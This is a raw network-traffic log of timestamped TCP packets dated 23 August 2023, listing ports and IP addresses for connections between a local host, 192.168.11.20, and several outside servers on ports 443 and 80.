                                                                                                                                                                                Aug 23, 2023 09:28:59.018325090 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.018388987 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.018429041 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.018492937 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.018493891 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.018543005 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.018619061 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.018728018 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.018728018 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.018759966 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.018800974 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.018834114 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.018948078 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.019011021 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.019048929 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.019174099 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.019287109 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.019325972 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.019366980 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.019506931 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.019532919 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.019565105 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.019588947 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.019678116 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.019793034 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.019804955 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.019845963 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.019996881 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.020011902 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.020071030 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.020157099 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.020232916 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.020241022 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.020263910 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.020415068 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.020458937 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.020611048 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.020612955 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.020652056 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.020668030 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.020682096 CEST44349922172.217.18.97192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:28:59.020764112 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.020765066 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:28:59.020864010 CEST49922443192.168.11.20172.217.18.97
                                                                                                                                                                                Aug 23, 2023 09:29:42.547169924 CEST4992880192.168.11.20198.54.117.212
                                                                                                                                                                                Aug 23, 2023 09:29:42.718080997 CEST8049928198.54.117.212192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:29:42.718305111 CEST4992880192.168.11.20198.54.117.212
                                                                                                                                                                                Aug 23, 2023 09:29:42.718305111 CEST4992880192.168.11.20198.54.117.212
                                                                                                                                                                                Aug 23, 2023 09:29:42.889493942 CEST8049928198.54.117.212192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:29:42.889569998 CEST8049928198.54.117.212192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:30:23.769351959 CEST4993180192.168.11.20104.21.6.57
                                                                                                                                                                                Aug 23, 2023 09:30:23.778059006 CEST8049931104.21.6.57192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:30:23.778167963 CEST4993180192.168.11.20104.21.6.57
                                                                                                                                                                                Aug 23, 2023 09:30:23.778245926 CEST4993180192.168.11.20104.21.6.57
                                                                                                                                                                                Aug 23, 2023 09:30:23.787050962 CEST8049931104.21.6.57192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:30:24.282337904 CEST4993180192.168.11.20104.21.6.57
                                                                                                                                                                                Aug 23, 2023 09:30:24.291443110 CEST8049931104.21.6.57192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:30:24.291702032 CEST4993180192.168.11.20104.21.6.57
                                                                                                                                                                                Aug 23, 2023 09:30:44.531882048 CEST4993280192.168.11.2085.10.194.228
                                                                                                                                                                                Aug 23, 2023 09:30:44.544895887 CEST804993285.10.194.228192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:30:44.545161009 CEST4993280192.168.11.2085.10.194.228
                                                                                                                                                                                Aug 23, 2023 09:30:44.545161009 CEST4993280192.168.11.2085.10.194.228
                                                                                                                                                                                Aug 23, 2023 09:30:44.558166981 CEST804993285.10.194.228192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:30:44.673171997 CEST804993285.10.194.228192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:30:44.673234940 CEST804993285.10.194.228192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:30:44.673563957 CEST4993280192.168.11.2085.10.194.228
                                                                                                                                                                                Aug 23, 2023 09:30:44.673564911 CEST4993280192.168.11.2085.10.194.228
                                                                                                                                                                                Aug 23, 2023 09:30:44.686474085 CEST804993285.10.194.228192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:31:04.837472916 CEST4993380192.168.11.2034.102.136.180
                                                                                                                                                                                Aug 23, 2023 09:31:04.844507933 CEST804993334.102.136.180192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:31:04.844912052 CEST4993380192.168.11.2034.102.136.180
                                                                                                                                                                                Aug 23, 2023 09:31:04.844970942 CEST4993380192.168.11.2034.102.136.180
                                                                                                                                                                                Aug 23, 2023 09:31:04.851948977 CEST804993334.102.136.180192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:31:04.965764046 CEST804993334.102.136.180192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:31:04.965840101 CEST804993334.102.136.180192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:31:04.966207981 CEST4993380192.168.11.2034.102.136.180
                                                                                                                                                                                Aug 23, 2023 09:31:04.966207981 CEST4993380192.168.11.2034.102.136.180
                                                                                                                                                                                Aug 23, 2023 09:31:04.981961966 CEST804993334.102.136.180192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:31:25.558445930 CEST4993680192.168.11.2043.154.67.170
                                                                                                                                                                                Aug 23, 2023 09:31:25.801192045 CEST804993643.154.67.170192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:31:25.801440001 CEST4993680192.168.11.2043.154.67.170
                                                                                                                                                                                Aug 23, 2023 09:31:25.801440954 CEST4993680192.168.11.2043.154.67.170
                                                                                                                                                                                Aug 23, 2023 09:31:26.044203997 CEST804993643.154.67.170192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:31:26.044272900 CEST804993643.154.67.170192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:31:26.044325113 CEST804993643.154.67.170192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:31:26.044611931 CEST4993680192.168.11.2043.154.67.170
                                                                                                                                                                                Aug 23, 2023 09:31:26.044611931 CEST4993680192.168.11.2043.154.67.170
                                                                                                                                                                                Aug 23, 2023 09:31:26.287261963 CEST804993643.154.67.170192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:32:26.945333958 CEST4993780192.168.11.20188.114.97.3
                                                                                                                                                                                Aug 23, 2023 09:32:26.954284906 CEST8049937188.114.97.3192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:32:26.954531908 CEST4993780192.168.11.20188.114.97.3
                                                                                                                                                                                Aug 23, 2023 09:32:26.954531908 CEST4993780192.168.11.20188.114.97.3
                                                                                                                                                                                Aug 23, 2023 09:32:26.963527918 CEST8049937188.114.97.3192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:32:27.056411028 CEST8049937188.114.97.3192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:32:27.056480885 CEST8049937188.114.97.3192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:32:27.056529999 CEST8049937188.114.97.3192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:32:27.056802988 CEST4993780192.168.11.20188.114.97.3
                                                                                                                                                                                Aug 23, 2023 09:32:27.056802988 CEST4993780192.168.11.20188.114.97.3
                                                                                                                                                                                Aug 23, 2023 09:32:27.056874990 CEST4993780192.168.11.20188.114.97.3
                                                                                                                                                                                Aug 23, 2023 09:32:47.254146099 CEST4993880192.168.11.20185.53.179.91
                                                                                                                                                                                Aug 23, 2023 09:32:47.272589922 CEST8049938185.53.179.91192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:32:47.272814035 CEST4993880192.168.11.20185.53.179.91
                                                                                                                                                                                Aug 23, 2023 09:32:47.291450977 CEST8049938185.53.179.91192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:32:47.291632891 CEST4993880192.168.11.20185.53.179.91
                                                                                                                                                                                Aug 23, 2023 09:32:47.310064077 CEST8049938185.53.179.91192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:32:47.310131073 CEST8049938185.53.179.91192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:32:47.310178995 CEST8049938185.53.179.91192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:32:47.310504913 CEST4993880192.168.11.20185.53.179.91
                                                                                                                                                                                Aug 23, 2023 09:32:47.310506105 CEST4993880192.168.11.20185.53.179.91
                                                                                                                                                                                Aug 23, 2023 09:32:47.329123020 CEST8049938185.53.179.91192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:33:28.079822063 CEST4993980192.168.11.2076.223.26.96
                                                                                                                                                                                Aug 23, 2023 09:33:28.091974020 CEST804993976.223.26.96192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:33:28.092112064 CEST4993980192.168.11.2076.223.26.96
                                                                                                                                                                                Aug 23, 2023 09:33:28.092219114 CEST4993980192.168.11.2076.223.26.96
                                                                                                                                                                                Aug 23, 2023 09:33:28.104239941 CEST804993976.223.26.96192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:33:28.128123045 CEST804993976.223.26.96192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:33:28.128242970 CEST804993976.223.26.96192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:33:28.128475904 CEST4993980192.168.11.2076.223.26.96
                                                                                                                                                                                Aug 23, 2023 09:33:28.128475904 CEST4993980192.168.11.2076.223.26.96
                                                                                                                                                                                Aug 23, 2023 09:33:28.140343904 CEST804993976.223.26.96192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.075582981 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.128873110 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.129182100 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.129230976 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.182981968 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.197539091 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.197659969 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.197743893 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.197818995 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.197884083 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.197917938 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.197953939 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.197988987 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.198050976 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.198151112 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.198195934 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.198215961 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.198273897 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.198374033 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.198466063 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.251730919 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.251825094 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.251889944 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.251960039 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.251993895 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.252099037 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.252151966 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.252190113 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.252249956 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.252327919 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.252388000 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.252445936 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.252456903 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.252513885 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.252532959 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.252571106 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.252635002 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.252676964 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.252700090 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.252727985 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.252756119 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.252830029 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.252840042 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.252893925 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.252960920 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.252978086 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.253025055 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.253086090 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.253108025 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.253243923 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.306274891 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.306395054 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.306477070 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.306551933 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.306606054 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.306611061 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.306668043 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.306726933 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.306740046 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.306798935 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.306863070 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.306870937 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.306972027 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.307035923 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.307105064 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.307166100 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.307215929 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.307240009 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.307302952 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.307362080 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.307368994 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.307450056 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.307466030 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.307543993 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.307605028 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.307657957 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.307661057 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.307737112 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.307751894 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.307800055 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.307857990 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.307878971 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.307930946 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.307991028 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.308027983 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.308137894 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.308175087 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.308253050 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.308315992 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.308382034 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.308459997 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.308557034 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.308593988 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.308665037 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.308845043 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.308917046 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.308927059 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.308928013 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.309037924 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.309087992 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.309112072 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.309159040 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.309175968 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.309204102 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.309245110 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.309282064 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.309313059 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.309329033 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.309371948 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.309420109 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.309443951 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.309478045 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.309505939 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.309525967 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.309597015 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.309647083 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.360193014 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.360295057 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.360354900 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.360419989 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.360450029 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.360506058 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.360615015 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.360615015 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.360905886 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.361011982 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.361138105 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.361212015 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.361479044 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.361562967 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.361700058 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.361720085 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.361747980 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.361790895 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.361900091 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.361938000 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.361972094 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.362000942 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.362129927 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.362173080 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.362240076 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.362277031 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.362309933 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.362379074 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.362390995 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.362468958 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.362495899 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.362567902 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.362571001 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.362628937 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.362679005 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.362725019 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.362751961 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.362771988 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.362880945 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.362910986 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.362950087 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.363008976 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.363025904 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.363106012 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.363137007 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.363152027 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.363264084 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.363289118 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.363357067 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.363419056 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.363431931 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.363491058 CEST804994231.31.198.61192.168.11.20
                                                                                                                                                                                Aug 23, 2023 09:34:09.363507986 CEST4994280192.168.11.2031.31.198.61
                                                                                                                                                                                Aug 23, 2023 09:34:09.363600016 CEST4994280192.168.11.2031.31.198.61
